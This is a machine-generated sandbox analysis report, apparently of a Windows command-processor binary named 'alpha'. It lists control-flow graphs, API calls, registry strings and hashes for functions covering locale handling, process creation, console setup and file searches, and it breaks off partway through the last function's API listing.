7ff79375f0bb-7ff79375f0c5 435->439 440 7ff7937553ec-7ff79375540e GetLocaleInfoW 435->440 441 7ff79375f04e-7ff79375f055 436->441 442 7ff79375f064-7ff79375f06f 436->442 443 7ff79375f0a7-7ff79375f0b2 437->443 444 7ff79375f091-7ff79375f098 437->444 438->428 438->433 445 7ff79375f0c8-7ff79375f0d2 439->445 446 7ff79375f0fe-7ff79375f108 440->446 447 7ff793755414-7ff793755436 GetLocaleInfoW 440->447 441->442 448 7ff79375f057-7ff79375f062 441->448 442->434 443->439 444->443 449 7ff79375f09a-7ff79375f0a5 444->449 450 7ff79375f0ea-7ff79375f0f5 445->450 451 7ff79375f0d4-7ff79375f0db 445->451 454 7ff79375f10b-7ff79375f115 446->454 452 7ff79375543c-7ff79375545e GetLocaleInfoW 447->452 453 7ff79375f141-7ff79375f14b 447->453 448->436 448->442 449->437 449->443 450->446 451->450 456 7ff79375f0dd-7ff79375f0e8 451->456 457 7ff79375f184-7ff79375f18b 452->457 458 7ff793755464-7ff793755486 GetLocaleInfoW 452->458 455 7ff79375f14e-7ff79375f158 453->455 459 7ff79375f12d-7ff79375f138 454->459 460 7ff79375f117-7ff79375f11e 454->460 462 7ff79375f15a-7ff79375f161 455->462 463 7ff79375f170-7ff79375f17b 455->463 456->445 456->450 464 7ff79375f18e-7ff79375f198 457->464 465 7ff79375548c-7ff7937554ae GetLocaleInfoW 458->465 466 7ff79375f1c4-7ff79375f1ce 458->466 459->453 460->459 461 7ff79375f120-7ff79375f12b 460->461 461->454 461->459 462->463 468 7ff79375f163-7ff79375f16e 462->468 463->457 469 7ff79375f19a-7ff79375f1a1 464->469 470 7ff79375f1b0-7ff79375f1bb 464->470 471 7ff79375f207-7ff79375f20e 465->471 472 7ff7937554b4-7ff7937554f5 setlocale call 7ff793758f80 465->472 467 7ff79375f1d1-7ff79375f1db 466->467 473 7ff79375f1dd-7ff79375f1e4 467->473 474 7ff79375f1f3-7ff79375f1fe 467->474 468->455 468->463 469->470 476 7ff79375f1a3-7ff79375f1ae 469->476 470->466 475 7ff79375f211-7ff79375f21b 471->475 473->474 479 7ff79375f1e6-7ff79375f1f1 473->479 474->471 480 7ff79375f21d-7ff79375f224 475->480 481 7ff79375f233-7ff79375f23e 475->481 476->464 476->470 479->467 479->474 480->481 482 7ff79375f226-7ff79375f231 480->482 482->475 482->481
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoLocale$DefaultUsersetlocale
                                                                                      • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                      • API String ID: 1351325837-2236139042
                                                                                      • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                      • Instruction ID: e0b5a3593ae4b09b2ad2ad2e652c9219d7e4c6ef6faf26e3d431666c5e2da33e
                                                                                      • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                      • Instruction Fuzzy Hash: 33F13B61B04742C5EBB5AF21D5902B9A2A8FF0CB91FD44536CA0E677A4EF3CE506C360
                                                                                      Function 00007FF793754224 Relevance: 45.8, APIs: 19, Strings: 7, Instructions: 328threadprocessstringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 483 7ff793754224-7ff7937542a5 InitializeProcThreadAttributeList 484 7ff7937542ab-7ff7937542e5 UpdateProcThreadAttribute 483->484 485 7ff79375ecd4-7ff79375ecee GetLastError call 7ff793769eec 483->485 486 7ff7937542eb-7ff7937543c6 memset * 2 GetStartupInfoW call 7ff793753a90 call 7ff79374b900 484->486 487 7ff79375ecf0-7ff79375ed19 GetLastError call 7ff793769eec DeleteProcThreadAttributeList 484->487 492 7ff79375ed1e 485->492 497 7ff7937543cc-7ff7937543d3 486->497 498 7ff793754638-7ff793754644 _local_unwind 486->498 487->492 499 7ff793754649-7ff793754650 497->499 500 7ff7937543d9-7ff7937543dc 497->500 498->499 499->500 503 7ff793754656-7ff79375465d 499->503 501 7ff7937543de-7ff7937543f5 wcsrchr 500->501 502 7ff793754415-7ff793754424 call 7ff793755a68 500->502 501->502 504 7ff7937543f7-7ff79375440f lstrcmpW 501->504 509 7ff793754589-7ff793754590 502->509 510 7ff79375442a-7ff793754486 CreateProcessW 502->510 503->502 506 7ff793754663 503->506 504->502 508 7ff793754668-7ff79375466d call 7ff793769044 504->508 506->500 508->502 509->510 514 7ff793754596-7ff7937545fa CreateProcessAsUserW 509->514 512 7ff79375448b-7ff79375448f 510->512 515 7ff793754495-7ff7937544c7 CloseHandle call 7ff79375498c 512->515 516 7ff793754672-7ff793754682 GetLastError 512->516 514->512 519 7ff79375468d-7ff793754694 515->519 520 7ff7937544cd-7ff7937544e5 515->520 516->519 521 7ff793754696-7ff7937546a0 519->521 522 7ff7937546a2-7ff7937546ac 519->522 523 7ff7937544eb-7ff7937544f2 520->523 524 7ff7937547a3-7ff7937547a9 520->524 521->522 525 7ff7937546ae-7ff7937546b5 call 7ff7937597bc 521->525 522->525 526 7ff793754705-7ff793754707 522->526 528 7ff7937544f8-7ff793754507 523->528 529 7ff7937545ff-7ff793754607 523->529 541 7ff7937546b7-7ff793754701 call 7ff79379c038 525->541 542 7ff793754703 525->542 526->520 527 7ff79375470d-7ff79375472a call 7ff79374cd90 526->527 543 7ff79375472c-7ff793754738 _local_unwind 527->543 544 7ff79375473d-7ff793754767 call 7ff7937513e0 call 7ff793769eec call 7ff79374ff70 _local_unwind 527->544 532 7ff79375450d-7ff793754553 call 7ff793755cb4 call 7ff7937533f0 call 7ff79375498c 528->532 533 7ff793754612-7ff793754616 528->533 529->528 534 7ff79375460d 529->534 566 7ff793754558-7ff79375455e 532->566 539 7ff79375461c-7ff793754633 533->539 540 7ff7937547d7-7ff7937547df 533->540 538 7ff79375476c-7ff793754773 534->538 538->528 548 7ff793754779-7ff793754780 538->548 546 7ff7937547f2-7ff79375483c call 7ff79374ff70 DeleteProcThreadAttributeList call 7ff793758f80 539->546 545 7ff7937547e1-7ff7937547ed CloseHandle 540->545 540->546 541->526 542->526 543->544 544->538 545->546 548->528 553 7ff793754786-7ff793754789 548->553 553->528 558 7ff79375478f-7ff793754792 553->558 558->524 562 7ff793754794-7ff79375479d call 7ff79376a250 558->562 562->524 562->528 567 7ff7937547ae-7ff7937547ca call 7ff7937533f0 566->567 568 7ff793754564-7ff793754579 call 7ff79375498c 566->568 567->540 568->546 576 7ff79375457f-7ff793754584 call 7ff79376a920 568->576 576->546
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                                                      • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                                                                      • API String ID: 388421343-2905461000
                                                                                      • Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                      • Instruction ID: 36eef53106bbb2fae4f4d88116937c35fa51eaed6ff1f9c23c6529cd3fa427eb
                                                                                      • Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                      • Instruction Fuzzy Hash: C5F13132A0D78295EAB4AB21E4C47BAF7A8FB8D741F804136D94D62754DF3CE445CB60
                                                                                      Function 00007FF793755554 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 295registryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 579 7ff793755554-7ff7937555b9 call 7ff79375a640 582 7ff7937555bc-7ff7937555e8 RegOpenKeyExW 579->582 583 7ff7937555ee-7ff793755631 RegQueryValueExW 582->583 584 7ff793755887-7ff79375588e 582->584 585 7ff79375f248-7ff79375f24d 583->585 586 7ff793755637-7ff793755675 RegQueryValueExW 583->586 584->582 587 7ff793755894-7ff7937558db time srand call 7ff793758f80 584->587 591 7ff79375f260-7ff79375f265 585->591 592 7ff79375f24f-7ff79375f25b 585->592 588 7ff79375568e-7ff7937556cc RegQueryValueExW 586->588 589 7ff793755677-7ff79375567c 586->589 595 7ff79375f2b6-7ff79375f2bb 588->595 596 7ff7937556d2-7ff793755710 RegQueryValueExW 588->596 593 7ff79375f28b-7ff79375f290 589->593 594 7ff793755682-7ff793755687 589->594 591->586 598 7ff79375f26b-7ff79375f286 _wtol 591->598 592->586 593->588 601 7ff79375f296-7ff79375f2b1 _wtol 593->601 594->588 602 7ff79375f2ce-7ff79375f2d3 595->602 603 7ff79375f2bd-7ff79375f2c9 595->603 599 7ff793755729-7ff793755767 RegQueryValueExW 596->599 600 7ff793755712-7ff793755717 596->600 598->586 607 7ff793755769-7ff79375576e 599->607 608 7ff79375579f-7ff7937557dd RegQueryValueExW 599->608 605 7ff79375571d-7ff793755722 600->605 606 7ff79375f2f9-7ff79375f2fe 600->606 601->588 602->596 604 7ff79375f2d9-7ff79375f2f4 _wtol 602->604 603->596 604->596 605->599 606->599 609 7ff79375f304-7ff79375f31a wcstol 606->609 610 7ff793755774-7ff79375578f 607->610 611 7ff79375f320-7ff79375f325 607->611 612 7ff79375f3a9 608->612 613 7ff7937557e3-7ff7937557e8 608->613 609->611 616 7ff79375f357-7ff79375f35e 610->616 617 7ff793755795-7ff793755799 610->617 614 7ff79375f34b 611->614 615 7ff79375f327-7ff79375f33f wcstol 611->615 620 7ff79375f3b5-7ff79375f3b8 612->620 618 7ff7937557ee-7ff793755809 613->618 619 7ff79375f363-7ff79375f368 613->619 614->616 615->614 616->608 617->608 617->616 623 7ff79375f39a-7ff79375f39d 618->623 624 7ff79375580f-7ff793755813 618->624 621 7ff79375f38e 619->621 622 7ff79375f36a-7ff79375f382 wcstol 619->622 625 7ff79375582c 620->625 626 7ff79375f3be-7ff79375f3c5 620->626 621->623 622->621 623->612 624->623 627 7ff793755819-7ff793755823 624->627 629 7ff79375f3ca-7ff79375f3d1 625->629 630 7ff793755832-7ff793755870 RegQueryValueExW 625->630 626->630 627->620 628 7ff793755829 627->628 628->625 631 7ff79375f3dd-7ff79375f3e2 629->631 630->631 632 7ff793755876-7ff793755882 RegCloseKey 630->632 633 7ff79375f3e4-7ff79375f412 ExpandEnvironmentStringsW 631->633 634 7ff79375f433-7ff79375f439 631->634 632->584 636 7ff79375f428 633->636 637 7ff79375f414-7ff79375f426 call 7ff7937513e0 633->637 634->632 635 7ff79375f43f-7ff79375f44c call 7ff79374b900 634->635 635->632 640 7ff79375f42e 636->640 637->640 640->634
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: QueryValue$CloseOpensrandtime
                                                                                      • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                      • API String ID: 145004033-3846321370
                                                                                      • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                      • Instruction ID: f1e56129956c445456494d9acf5baf7c64b1fbbc8c684472000762b9549fe907
                                                                                      • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                      • Instruction Fuzzy Hash: 6FE1713261DA82C6E7B0AB20E48057AF7A8FB8C755F805536E68F52B54DF7CE544CB20
                                                                                      Function 00007FF7937537D8 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 269registrythreadmemoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 821 7ff7937537d8-7ff793753887 GetCurrentThreadId OpenThread call 7ff7937504f4 HeapSetInformation RegOpenKeyExW 824 7ff79375388d-7ff7937538eb call 7ff793755920 GetConsoleOutputCP GetCPInfo 821->824 825 7ff79375e9f8-7ff79375ea3b RegQueryValueExW RegCloseKey 821->825 828 7ff79375ea41-7ff79375ea59 GetThreadLocale 824->828 829 7ff7937538f1-7ff793753913 memset 824->829 825->828 830 7ff79375ea5b-7ff79375ea67 828->830 831 7ff79375ea74-7ff79375ea77 828->831 832 7ff793753919-7ff793753935 call 7ff793754d5c 829->832 833 7ff79375eaa5 829->833 830->831 834 7ff79375ea79-7ff79375ea7d 831->834 835 7ff79375ea94-7ff79375ea96 831->835 841 7ff79375393b-7ff793753942 832->841 842 7ff79375eae2-7ff79375eaff call 7ff793743240 call 7ff793768530 call 7ff793754c1c 832->842 838 7ff79375eaa8-7ff79375eab4 833->838 834->835 837 7ff79375ea7f-7ff79375ea89 834->837 835->833 837->835 838->832 840 7ff79375eaba-7ff79375eac3 838->840 843 7ff79375eacb-7ff79375eace 840->843 847 7ff79375eb27-7ff79375eb40 _setjmp 841->847 848 7ff793753948-7ff793753962 _setjmp 841->848 854 7ff79375eb00-7ff79375eb0d 842->854 844 7ff79375eac5-7ff79375eac9 843->844 845 7ff79375ead0-7ff79375eadb 843->845 844->843 845->838 851 7ff79375eadd 845->851 849 7ff7937539fe-7ff793753a05 call 7ff793754c1c 847->849 850 7ff79375eb46-7ff79375eb49 847->850 853 7ff793753968-7ff79375396d 848->853 848->854 849->825 855 7ff79375eb4b-7ff79375eb65 call 7ff793743240 call 7ff793768530 call 7ff793754c1c 850->855 856 7ff79375eb66-7ff79375eb6f call 7ff7937501b8 850->856 851->832 858 7ff7937539b9-7ff7937539bb 853->858 859 7ff79375396f 853->859 867 7ff79375eb15-7ff79375eb1f call 7ff793754c1c 854->867 855->856 880 7ff79375eb87-7ff79375eb89 call 7ff7937586f0 856->880 881 7ff79375eb71-7ff79375eb82 _setmode 856->881 862 7ff79375eb20 858->862 863 7ff7937539c1-7ff7937539c3 call 7ff793754c1c 858->863 866 7ff793753972-7ff79375397d 859->866 862->847 877 7ff7937539c8 863->877 873 7ff7937539c9-7ff7937539de call 7ff79374df60 866->873 874 7ff79375397f-7ff793753984 866->874 867->862 873->867 889 7ff7937539e4-7ff7937539e8 873->889 874->866 882 7ff793753986-7ff7937539ae call 7ff793750580 GetConsoleOutputCP GetCPInfo call 7ff7937504f4 874->882 877->873 890 7ff79375eb8e-7ff79375ebad call 7ff7937558e4 call 7ff79374df60 880->890 881->880 897 7ff7937539b3 882->897 889->849 894 7ff7937539ea-7ff7937539ef call 7ff79374be00 889->894 902 7ff79375ebaf-7ff79375ebb3 890->902 900 7ff7937539f4-7ff7937539fc 894->900 897->858 900->874 902->849 903 7ff79375ebb9-7ff79375ec24 call 7ff7937558e4 GetConsoleOutputCP GetCPInfo call 7ff7937504f4 call 7ff79374be00 call 7ff793750580 GetConsoleOutputCP GetCPInfo call 7ff7937504f4 902->903 903->890
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                      • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                      • API String ID: 2624720099-1920437939
                                                                                      • Opcode ID: bc784ebed84259970a51cd510c23a28617bcb94ad13cc89061c4f660481954aa
                                                                                      • Instruction ID: aa689dcef4715ea118d2ce4aa4cc1af3415a4e338a07633f27a695ea0dd10008
                                                                                      • Opcode Fuzzy Hash: bc784ebed84259970a51cd510c23a28617bcb94ad13cc89061c4f660481954aa
                                                                                      • Instruction Fuzzy Hash: 4BC1AF31E086428AF7B8BB7094C02B8FAA9FF4D755F84413AD90E667A1DF3CA4418770
                                                                                      Function 00007FF79375823C Relevance: 15.1, APIs: 10, Instructions: 116COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1118 7ff79375823c-7ff79375829b FindFirstFileExW 1119 7ff7937582cd-7ff7937582df 1118->1119 1120 7ff79375829d-7ff7937582a9 GetLastError 1118->1120 1124 7ff793758365-7ff79375837b FindNextFileW 1119->1124 1125 7ff7937582e5-7ff7937582ee 1119->1125 1121 7ff7937582af 1120->1121 1122 7ff7937582b1-7ff7937582cb 1121->1122 1126 7ff79375837d-7ff793758380 1124->1126 1127 7ff7937583d0-7ff7937583e5 FindClose 1124->1127 1128 7ff7937582f1-7ff7937582f4 1125->1128 1126->1119 1129 7ff793758386 1126->1129 1127->1128 1130 7ff793758329-7ff79375832b 1128->1130 1131 7ff7937582f6-7ff793758300 1128->1131 1129->1120 1130->1121 1134 7ff79375832d 1130->1134 1132 7ff793758332-7ff793758353 GetProcessHeap HeapAlloc 1131->1132 1133 7ff793758302-7ff79375830e 1131->1133 1135 7ff793758356-7ff793758363 1132->1135 1136 7ff79375838b-7ff7937583c2 GetProcessHeap HeapReAlloc 1133->1136 1137 7ff793758310-7ff793758313 1133->1137 1134->1120 1135->1137 1138 7ff7937650f8-7ff79376511e GetLastError FindClose 1136->1138 1139 7ff7937583c8-7ff7937583ce 1136->1139 1140 7ff793758327 1137->1140 1141 7ff793758315-7ff793758323 1137->1141 1138->1122 1139->1135 1140->1130 1141->1140
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileFindFirstLast
                                                                                      • String ID:
                                                                                      • API String ID: 873889042-0
                                                                                      • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                      • Instruction ID: 5cb93b0c815139a14eb5a2b2fbb0c5163f8c1f1c3d10c3d8db14a94202199cc4
                                                                                      • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                      • Instruction Fuzzy Hash: 00515231609B4296E7A4AF25E4C4179FBA8FB5DB91F848131CA1E63350CF3CE9548B60
                                                                                      Function 00007FF793752978 Relevance: 9.1, APIs: 6, Instructions: 138COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1142 7ff793752978-7ff7937529b6 1143 7ff7937529b9-7ff7937529c1 1142->1143 1143->1143 1144 7ff7937529c3-7ff7937529c5 1143->1144 1145 7ff7937529cb-7ff7937529cf 1144->1145 1146 7ff79375e441 1144->1146 1147 7ff7937529d2-7ff7937529da 1145->1147 1148 7ff7937529dc-7ff7937529e1 1147->1148 1149 7ff793752a1e-7ff793752a3e FindFirstFileW 1147->1149 1148->1149 1150 7ff7937529e3-7ff7937529eb 1148->1150 1151 7ff793752a44-7ff793752a5c FindClose 1149->1151 1152 7ff79375e435-7ff79375e439 1149->1152 1150->1147 1153 7ff7937529ed-7ff793752a1c call 7ff793758f80 1150->1153 1154 7ff793752ae3-7ff793752ae5 1151->1154 1155 7ff793752a62-7ff793752a6e 1151->1155 1152->1146 1156 7ff793752aeb-7ff793752b10 _wcsnicmp 1154->1156 1157 7ff79375e3f7-7ff79375e3ff 1154->1157 1159 7ff793752a70-7ff793752a78 1155->1159 1156->1155 1160 7ff793752b16-7ff79375e3f1 _wcsicmp 1156->1160 1159->1159 1162 7ff793752a7a-7ff793752a8d 1159->1162 1160->1155 1160->1157 1162->1146 1164 7ff793752a93-7ff793752a97 1162->1164 1165 7ff793752a9d-7ff793752ade memmove call 7ff7937513e0 1164->1165 1166 7ff79375e404-7ff79375e407 1164->1166 1165->1150 1167 7ff79375e40b-7ff79375e413 1166->1167 1167->1167 1170 7ff79375e415-7ff79375e42b memmove 1167->1170 1170->1152
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                      • Instruction ID: 137b81312464587e912c7fe46cf54c87c312066157ef4a3f296ecb72c3305a52
                                                                                      • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                      • Instruction Fuzzy Hash: 28511821F0868285EAB4AF2595C42BAE694FB5CBA0FC45236DE6E677D0DF3CE441C710
                                                                                      Function 00007FF793754D5C Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 268memorylibraryloaderCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 643 7ff793754d5c-7ff793754e4b InitializeCriticalSection call 7ff7937558e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff793750580 call 7ff793754a14 call 7ff793754ad0 call 7ff793755554 GetCommandLineW 654 7ff793754e4d-7ff793754e54 643->654 654->654 655 7ff793754e56-7ff793754e61 654->655 656 7ff793754e67-7ff793754e7b call 7ff793752e44 655->656 657 7ff7937551cf-7ff7937551e3 call 7ff793743278 call 7ff793754c1c 655->657 663 7ff7937551ba-7ff7937551ce call 7ff793743278 call 7ff793754c1c 656->663 664 7ff793754e81-7ff793754ec3 GetCommandLineW call 7ff7937513e0 call 7ff79374ca40 656->664 663->657 664->663 674 7ff793754ec9-7ff793754ee8 call 7ff79375417c call 7ff793752394 664->674 678 7ff793754eed-7ff793754ef5 674->678 678->678 679 7ff793754ef7-7ff793754f1f call 7ff79374aa54 678->679 682 7ff793754f95-7ff793754fee GetConsoleOutputCP GetCPInfo call 7ff7937551ec GetProcessHeap HeapAlloc 679->682 683 7ff793754f21-7ff793754f30 679->683 688 7ff793754ff0-7ff793755006 GetConsoleTitleW 682->688 689 7ff793755012-7ff793755018 682->689 683->682 685 7ff793754f32-7ff793754f39 683->685 685->682 687 7ff793754f3b-7ff793754f77 call 7ff793743278 GetWindowsDirectoryW 685->687 696 7ff793754f7d-7ff793754f90 call 7ff793753c24 687->696 697 7ff7937551b1-7ff7937551b9 call 7ff793754c1c 687->697 688->689 691 7ff793755008-7ff79375500f 688->691 692 7ff79375507a-7ff79375507e 689->692 693 7ff79375501a-7ff793755024 call 7ff793753578 689->693 691->689 698 7ff7937550eb-7ff793755161 GetModuleHandleW GetProcAddress * 3 692->698 699 7ff793755080-7ff7937550b3 call 7ff79376b89c call 7ff79374586c call 7ff793743240 call 7ff793753448 692->699 693->692 709 7ff793755026-7ff793755030 693->709 696->682 697->663 701 7ff793755163-7ff793755167 698->701 702 7ff79375516f 698->702 724 7ff7937550b5-7ff7937550d0 call 7ff793753448 * 2 699->724 725 7ff7937550d2-7ff7937550d7 call 7ff793743278 699->725 701->702 707 7ff793755169-7ff79375516d 701->707 708 7ff793755172-7ff7937551af free call 7ff793758f80 702->708 707->702 707->708 713 7ff793755075 call 7ff79376cff0 709->713 714 7ff793755032-7ff793755059 GetStdHandle GetConsoleScreenBufferInfo 709->714 713->692 717 7ff79375505b-7ff793755067 714->717 718 7ff793755069-7ff793755073 714->718 717->692 718->692 718->713 729 7ff7937550dc-7ff7937550e6 GlobalFree 724->729 725->729 729->698
                                                                                      APIs
                                                                                      • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754D9A
                                                                                        • Part of subcall function 00007FF7937558E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF79376C6DB), ref: 00007FF7937558EF
                                                                                      • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754DBB
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF793754DCA
